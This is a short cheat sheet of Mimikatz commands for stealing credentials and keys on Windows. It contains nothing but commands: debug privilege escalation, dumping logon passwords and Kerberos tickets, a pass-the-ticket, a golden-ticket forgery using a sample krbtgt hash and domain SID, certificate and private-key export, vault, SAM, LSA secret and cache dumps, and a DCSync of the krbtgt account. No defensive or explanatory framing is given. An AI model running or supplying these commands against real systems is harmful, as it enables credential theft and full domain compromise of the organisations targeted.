Mimikatz Commands

Enter debug mode (do this FIRST):
privilege::debug

Extract Passwords using Seskurlsa Commands:

  • sekurlsa::logonpasswords
    sekurlsa::tickets /export

Kerberos Commands:

  • kerberos::list /export
  • kerberos::ptt c:\chocolate.kirbi
  • kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

Crypto:

  • crypto::capi
  • crypto::cng
  • crypto::certificates /export
  • crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
  • crypto::keys /export
  • crypto::keys /machine /export

Vault & lsadump:

  • vault::cred
  • vault::list
  • token::elevate
  • vault::cred
  • vault::list
  • lsadump::sam
  • lsadump::secrets
  • lsadump::cache
  • token::revert
  • lsadump::dcsync /user:domain\krbtgt /domain:lab.local